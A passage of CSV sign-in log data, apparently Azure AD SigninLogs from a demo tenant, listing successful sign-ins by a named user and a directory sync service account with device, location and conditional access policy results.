+1348,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:17.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5423bf62-9037-4448-bcaa-3033b60d0500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5423bf62-9037-4448-bcaa-3033b60d0500,SigninLogs,Sucess,33.0175209,35.44601059
+1349,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4c5331d7-088c-44c1-8ac0-a65d1c5b1239,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",178eb907-c36d-4662-9369-da0209cf0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,178eb907-c36d-4662-9369-da0209cf0500,SigninLogs,Sucess,36.6404686,-78.26995087
+1350,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8e7a6c60-0c09-473f-9b19-91ec412de5c1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6c1d2f35-9fdd-4afe-865b-1042cf560600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6c1d2f35-9fdd-4afe-865b-1042cf560600,SigninLogs,Sucess,36.6404686,-78.26995087
+1351,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c3a7ae11-3090-46d7-95b6-d205871e0600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c3a7ae11-3090-46d7-95b6-d205871e0600,SigninLogs,Sucess,33.0175209,35.44601059
+1352,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:17.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5423bf62-9037-4448-bcaa-3033b60d0500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5423bf62-9037-4448-bcaa-3033b60d0500,SigninLogs,Sucess,33.0175209,35.44601059
+1353,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4c5331d7-088c-44c1-8ac0-a65d1c5b1239,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",178eb907-c36d-4662-9369-da0209cf0500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,178eb907-c36d-4662-9369-da0209cf0500,SigninLogs,Sucess,36.6404686,-78.26995087
+1354,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9698d18f-f4bc-4748-8728-c0199b48cc87,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",7688e8c0-f176-4f1e-95a2-c1ff55550700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,7688e8c0-f176-4f1e-95a2-c1ff55550700,SigninLogs,Sucess,36.6404686,-78.26995087
+1355,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,90797766-589a-4635-bacf-a42e81550772,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3a4d127f-5a89-4252-9f54-d79dd3590600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises 